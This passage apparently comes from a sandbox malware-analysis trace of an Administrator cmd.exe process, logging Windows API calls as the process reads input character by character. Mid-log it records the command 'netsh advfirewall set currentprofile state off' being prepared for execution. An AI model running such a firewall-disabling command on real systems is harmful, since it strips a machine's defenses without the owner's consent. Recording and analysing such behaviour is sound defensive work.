cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0135.964] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.964] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.964] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.964] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c76, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0135.964] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.964] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.964] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.964] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c78, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0135.964] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.964] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.964] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.964] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c7a, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0135.964] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.964] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.964] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.964] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c7c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0135.964] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.964] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.964] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.964] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c7e, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0135.964] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.964] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.965] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.965] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c80, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0135.965] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.965] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.965] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.965] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c82, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0135.965] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.965] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.965] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.965] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c84, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0135.965] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.965] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.965] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.965] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c86, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0135.965] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.965] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.965] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.965] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c88, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0135.965] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.965] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.965] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.965] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c8a, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0135.965] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.965] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.965] ReadFile (in: hFile=0x264, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x58b38ff648, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x58b38ff648*=0x1, lpOverlapped=0x0) returned 1 [0135.966] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c8c, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0135.966] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.966] GetFileType (hFile=0x264) returned 0x3 [0135.967] _get_osfhandle (_FileHandle=0) returned 0x264 [0135.967] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.967] _get_osfhandle (_FileHandle=1) returned 0x274 [0135.967] GetFileType (hFile=0x274) returned 0x3 [0135.967] _get_osfhandle (_FileHandle=1) returned 0x274 [0135.967] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="netsh advfirewall set currentprofile state off\n", cchWideChar=-1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="netsh advfirewall set currentprofile state off\n", lpUsedDefaultChar=0x0) returned 48 [0135.967] WriteFile (in: hFile=0x274, lpBuffer=0x7ff6de089970*, nNumberOfBytesToWrite=0x2f, lpNumberOfBytesWritten=0x58b38ff5e8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesWritten=0x58b38ff5e8*=0x2f, lpOverlapped=0x0) returned 1 [0135.967] GetProcessHeap () returned 0x1eeca2b0000 [0135.967] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0x4012) returned 0x1eeca2b8bb0 [0135.967] GetProcessHeap () returned 0x1eeca2b0000 [0135.967] RtlFreeHeap (HeapHandle=0x1eeca2b0000, Flags=0x0, BaseAddress=0x1eeca2b8bb0) returned 1 [0135.970] _wcsicmp (_String1="netsh", _String2=")") returned 69 [0135.970] _wcsicmp (_String1="FOR", _String2="netsh") returned -8 [0135.970] _wcsicmp (_String1="FOR/?", _String2="netsh") returned -8 [0135.970] _wcsicmp (_String1="IF", _String2="netsh") returned -5 [0135.970] _wcsicmp (_String1="IF/?", _String2="netsh") returned -5 [0135.970] _wcsicmp (_String1="REM", _String2="netsh") returned 4 [0135.970] _wcsicmp (_String1="REM/?", _String2="netsh") returned 4 [0135.970] GetProcessHeap () returned 0x1eeca2b0000 [0135.970] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0xb0) returned 0x1eeca2b6e30 [0135.970] GetProcessHeap () returned 0x1eeca2b0000 [0135.970] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0x1c) returned 0x1eeca2b6c60 [0135.971] GetProcessHeap () returned 0x1eeca2b0000 [0135.971] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0x64) returned 0x1eeca2b8bb0 [0135.972] GetConsoleOutputCP () returned 0x1b5 [0136.014] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff6de08fbb0 | out: lpCPInfo=0x7ff6de08fbb0) returned 1 [0136.014] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.022] GetConsoleTitleW (in: lpConsoleTitle=0x58b38ff430, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0136.023] malloc (_Size=0xffce) returned 0x1eeca3d0840 [0136.023] ??_V@YAXPEAX@Z () returned 0x1eeca3d0840 [0136.023] malloc (_Size=0xffce) returned 0x1eeca3e0820 [0136.023] ??_V@YAXPEAX@Z () returned 0x1eeca3e0820 [0136.024] _wcsicmp (_String1="netsh", _String2="DIR") returned 10 [0136.024] _wcsicmp (_String1="netsh", _String2="ERASE") returned 9 [0136.024] _wcsicmp (_String1="netsh", _String2="DEL") returned 10 [0136.024] _wcsicmp (_String1="netsh", _String2="TYPE") returned -6 [0136.024] _wcsicmp (_String1="netsh", _String2="COPY") returned 11 [0136.024] _wcsicmp (_String1="netsh", _String2="CD") returned 11 [0136.024] _wcsicmp (_String1="netsh", _String2="CHDIR") returned 11 [0136.024] _wcsicmp (_String1="netsh", _String2="RENAME") returned -4 [0136.024] _wcsicmp (_String1="netsh", _String2="REN") returned -4 [0136.024] _wcsicmp (_String1="netsh", _String2="ECHO") returned 9 [0136.024] _wcsicmp (_String1="netsh", _String2="SET") returned -5 [0136.024] _wcsicmp (_String1="netsh", _String2="PAUSE") returned -2 [0136.024] _wcsicmp (_String1="netsh", _String2="DATE") returned 10 [0136.024] _wcsicmp (_String1="netsh", _String2="TIME") returned -6 [0136.024] _wcsicmp (_String1="netsh", _String2="PROMPT") returned -2 [0136.024] _wcsicmp (_String1="netsh", _String2="MD") returned 1 [0136.024] _wcsicmp (_String1="netsh", _String2="MKDIR") returned 1 [0136.024] _wcsicmp (_String1="netsh", _String2="RD") returned -4 [0136.025] _wcsicmp (_String1="netsh", _String2="RMDIR") returned -4 [0136.025] _wcsicmp (_String1="netsh", _String2="PATH") returned -2 [0136.025] _wcsicmp (_String1="netsh", _String2="GOTO") returned 7 [0136.025] _wcsicmp (_String1="netsh", _String2="SHIFT") returned -5 [0136.025] _wcsicmp (_String1="netsh", _String2="CLS") returned 11 [0136.025] _wcsicmp (_String1="netsh", _String2="CALL") returned 11 [0136.025] _wcsicmp (_String1="netsh", _String2="VERIFY") returned -8 [0136.025] _wcsicmp (_String1="netsh", _String2="VER") returned -8 [0136.025] _wcsicmp (_String1="netsh", _String2="VOL") returned -8 [0136.025] _wcsicmp (_String1="netsh", _String2="EXIT") returned 9 [0136.025] _wcsicmp (_String1="netsh", _String2="SETLOCAL") returned -5 [0136.025] _wcsicmp (_String1="netsh", _String2="ENDLOCAL") returned 9 [0136.025] _wcsicmp (_String1="netsh", _String2="TITLE") returned -6 [0136.025] _wcsicmp (_String1="netsh", _String2="START") returned -5 [0136.025] _wcsicmp (_String1="netsh", _String2="DPATH") returned 10 [0136.025] _wcsicmp (_String1="netsh", _String2="KEYS") returned 3 [0136.025] _wcsicmp (_String1="netsh", _String2="MOVE") returned 1 [0136.025] _wcsicmp (_String1="netsh", _String2="PUSHD") returned -2 [0136.025] _wcsicmp (_String1="netsh", _String2="POPD") returned -2 [0136.025] _wcsicmp (_String1="netsh", _String2="ASSOC") returned 13 [0136.025] _wcsicmp (_String1="netsh", _String2="FTYPE") returned 8 [0136.025] _wcsicmp (_String1="netsh", _String2="BREAK") returned 12 [0136.025] _wcsicmp (_String1="netsh", _String2="COLOR") returned 11 [0136.025] _wcsicmp (_String1="netsh", _String2="MKLINK") returned 1 [0136.025] _wcsicmp (_String1="netsh", _String2="DIR") returned 10 [0136.025] _wcsicmp (_String1="netsh", _String2="ERASE") returned 9 [0136.025] _wcsicmp (_String1="netsh", _String2="DEL") returned 10 [0136.025] _wcsicmp (_String1="netsh", _String2="TYPE") returned -6 [0136.025] _wcsicmp (_String1="netsh", _String2="COPY") returned 11 [0136.025] _wcsicmp (_String1="netsh", _String2="CD") returned 11 [0136.025] _wcsicmp (_String1="netsh", _String2="CHDIR") returned 11 [0136.025] _wcsicmp (_String1="netsh", _String2="RENAME") returned -4 [0136.025] _wcsicmp (_String1="netsh", _String2="REN") returned -4 [0136.025] _wcsicmp (_String1="netsh", _String2="ECHO") returned 9 [0136.025] _wcsicmp (_String1="netsh", _String2="SET") returned -5 [0136.025] _wcsicmp (_String1="netsh", _String2="PAUSE") returned -2 [0136.025] _wcsicmp (_String1="netsh", _String2="DATE") returned 10 [0136.026] _wcsicmp (_String1="netsh", _String2="TIME") returned -6 [0136.026] _wcsicmp (_String1="netsh", _String2="PROMPT") returned -2 [0136.026] _wcsicmp (_String1="netsh", _String2="MD") returned 1 [0136.026] _wcsicmp (_String1="netsh", _String2="MKDIR") returned 1 [0136.026] _wcsicmp (_String1="netsh", _String2="RD") returned -4 [0136.026] _wcsicmp (_String1="netsh", _String2="RMDIR") returned -4 [0136.026] _wcsicmp (_String1="netsh", _String2="PATH") returned -2 [0136.026] _wcsicmp (_String1="netsh", _String2="GOTO") returned 7 [0136.026] _wcsicmp (_String1="netsh", _String2="SHIFT") returned -5 [0136.026] _wcsicmp (_String1="netsh", _String2="CLS") returned 11 [0136.026] _wcsicmp (_String1="netsh", _String2="CALL") returned 11 [0136.026] _wcsicmp (_String1="netsh", _String2="VERIFY") returned -8 [0136.026] _wcsicmp (_String1="netsh", _String2="VER") returned -8 [0136.026] _wcsicmp (_String1="netsh", _String2="VOL") returned -8 [0136.026] _wcsicmp (_String1="netsh", _String2="EXIT") returned 9 [0136.026] _wcsicmp (_String1="netsh", _String2="SETLOCAL") returned -5 [0136.026] _wcsicmp (_String1="netsh", _String2="ENDLOCAL") returned 9 [0136.026] _wcsicmp (_String1="netsh", _String2="TITLE") returned -6 [0136.026] _wcsicmp (_String1="netsh", _String2="START") returned -5 [0136.026] _wcsicmp (_String1="netsh", _String2="DPATH") returned 10 [0136.026] _wcsicmp (_String1="netsh", _String2="KEYS") returned 3 [0136.026] _wcsicmp (_String1="netsh", _String2="MOVE") returned 1 [0136.026] _wcsicmp (_String1="netsh", _String2="PUSHD") returned -2 [0136.026] _wcsicmp (_String1="netsh", _String2="POPD") returned -2 [0136.026] _wcsicmp (_String1="netsh", _String2="ASSOC") returned 13 [0136.026] _wcsicmp (_String1="netsh", _String2="FTYPE") returned 8 [0136.026] _wcsicmp (_String1="netsh", _String2="BREAK") returned 12 [0136.026] _wcsicmp (_String1="netsh", _String2="COLOR") returned 11 [0136.026] _wcsicmp (_String1="netsh", _String2="MKLINK") returned 1 [0136.026] _wcsicmp (_String1="netsh", _String2="FOR") returned 8 [0136.026] _wcsicmp (_String1="netsh", _String2="IF") returned 5 [0136.026] _wcsicmp (_String1="netsh", _String2="REM") returned -4 [0136.027] ??_V@YAXPEAX@Z () returned 0x1 [0136.027] GetProcessHeap () returned 0x1eeca2b0000 [0136.027] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0xffde) returned 0x1eeca2b8c20 [0136.027] GetProcessHeap () returned 0x1eeca2b0000 [0136.027] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0x70) returned 0x1eeca2c8c10 [0136.028] _wcsnicmp (_String1="nets", _String2="cmd ", _MaxCount=0x4) returned 11 [0136.028] malloc (_Size=0xffce) returned 0x1eeca3e0820 [0136.028] ??_V@YAXPEAX@Z () returned 0x1eeca3e0820 [0136.028] GetProcessHeap () returned 0x1eeca2b0000 [0136.028] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0x1ffac) returned 0x1eeca2c8c90 [0136.030] SetErrorMode (uMode=0x0) returned 0x0 [0136.030] SetErrorMode (uMode=0x1) returned 0x0 [0136.031] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x1eeca2c8ca0, lpFilePart=0x58b38fecb0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x58b38fecb0*="system32") returned 0x13 [0136.031] SetErrorMode (uMode=0x0) returned 0x1 [0136.031] GetProcessHeap () returned 0x1eeca2b0000 [0136.031] RtlReAllocateHeap (Heap=0x1eeca2b0000, Flags=0x0, Ptr=0x1eeca2c8c90, Size=0x44) returned 0x1eeca2c8c90 [0136.031] GetProcessHeap () returned 0x1eeca2b0000 [0136.031] RtlSizeHeap (HeapHandle=0x1eeca2b0000, Flags=0x0, MemoryPointer=0x1eeca2c8c90) returned 0x44 [0136.031] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff6de08bb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0136.031] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0136.031] GetProcessHeap () returned 0x1eeca2b0000 [0136.031] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0x1b4) returned 0x1eeca2c8cf0 [0136.031] GetProcessHeap () returned 0x1eeca2b0000 [0136.031] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0x358) returned 0x1eeca2c8eb0 [0136.036] GetProcessHeap () returned 0x1eeca2b0000 [0136.036] RtlReAllocateHeap (Heap=0x1eeca2b0000, Flags=0x0, Ptr=0x1eeca2c8eb0, Size=0x1b6) returned 0x1eeca2c8eb0 [0136.036] GetProcessHeap () returned 0x1eeca2b0000 [0136.036] RtlSizeHeap (HeapHandle=0x1eeca2b0000, Flags=0x0, MemoryPointer=0x1eeca2c8eb0) returned 0x1b6 [0136.036] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff6de08bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0136.036] GetProcessHeap () returned 0x1eeca2b0000 [0136.036] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0xe8) returned 0x1eeca2c9080 [0136.036] GetProcessHeap () returned 0x1eeca2b0000 [0136.036] RtlReAllocateHeap (Heap=0x1eeca2b0000, Flags=0x0, Ptr=0x1eeca2c9080, Size=0x7e) returned 0x1eeca2c9080 [0136.036] GetProcessHeap () returned 0x1eeca2b0000 [0136.036] RtlSizeHeap (HeapHandle=0x1eeca2b0000, Flags=0x0, MemoryPointer=0x1eeca2c9080) returned 0x7e [0136.036] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.036] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\netsh.*", fInfoLevelId=0x1, lpFindFileData=0x58b38fea20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x58b38fea20) returned 0x1eeca2c9110 [0136.037] GetProcessHeap () returned 0x1eeca2b0000 [0136.037] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x0, Size=0x28) returned 0x1eeca2b6a70 [0136.037] FindClose (in: hFindFile=0x1eeca2c9110 | out: hFindFile=0x1eeca2c9110) returned 1 [0136.037] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\netsh.COM", fInfoLevelId=0x1, lpFindFileData=0x58b38fea20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x58b38fea20) returned 0xffffffffffffffff [0136.037] GetLastError () returned 0x2 [0136.037] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\netsh.EXE", fInfoLevelId=0x1, lpFindFileData=0x58b38fea20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x58b38fea20) returned 0x1eeca2c9110 [0136.037] GetProcessHeap () returned 0x1eeca2b0000 [0136.037] RtlReAllocateHeap (Heap=0x1eeca2b0000, Flags=0x0, Ptr=0x1eeca2b6a70, Size=0x8) returned 0x1eeca2b6a70 [0136.037] FindClose (in: hFindFile=0x1eeca2c9110 | out: hFindFile=0x1eeca2c9110) returned 1 [0136.037] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0136.037] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0136.037] ??_V@YAXPEAX@Z () returned 0x1 [0136.037] GetConsoleTitleW (in: lpConsoleTitle=0x58b38fefa0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0136.040] GetProcessHeap () returned 0x1eeca2b0000 [0136.040] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0x21c) returned 0x1eeca2c9110 [0136.040] GetConsoleTitleW (in: lpConsoleTitle=0x1eeca2c9120, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0136.101] GetProcessHeap () returned 0x1eeca2b0000 [0136.101] RtlReAllocateHeap (Heap=0x1eeca2b0000, Flags=0x0, Ptr=0x1eeca2c9110, Size=0xd8) returned 0x1eeca2c9110 [0136.101] GetProcessHeap () returned 0x1eeca2b0000 [0136.101] RtlSizeHeap (HeapHandle=0x1eeca2b0000, Flags=0x0, MemoryPointer=0x1eeca2c9110) returned 0xd8 [0136.101] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe - netsh advfirewall set currentprofile state off") returned 1 [0136.139] GetProcessHeap () returned 0x1eeca2b0000 [0136.139] RtlFreeHeap (HeapHandle=0x1eeca2b0000, Flags=0x0, BaseAddress=0x1eeca2c9110) returned 1 [0136.139] InitializeProcThreadAttributeList (in: lpAttributeList=0x58b38feec0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x58b38fedb0 | out: lpAttributeList=0x58b38feec0, lpSize=0x58b38fedb0) returned 1 [0136.139] UpdateProcThreadAttribute (in: lpAttributeList=0x58b38feec0, dwFlags=0x0, Attribute=0x60001, lpValue=0x58b38fed9c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x58b38feec0, lpPreviousValue=0x0) returned 1 [0136.140] GetStartupInfoW (in: lpStartupInfo=0x58b38fee50 | out: lpStartupInfo=0x58b38fee50*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x264, hStdOutput=0x274, hStdError=0x274)) [0136.140] GetProcessHeap () returned 0x1eeca2b0000 [0136.140] RtlAllocateHeap (HeapHandle=0x1eeca2b0000, Flags=0x8, Size=0x20) returned 0x1eeca2b6ef0 [0136.140] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0136.140] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0136.140] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0136.140] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0136.140] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0136.140] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0136.140] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0136.140] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0136.140] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0136.140] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0136.140] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0136.140] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0136.140] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0136.140] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0136.140] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0136.140] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0136.140] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0136.140] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.140] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.140] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.140] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.140] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.140] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.140] 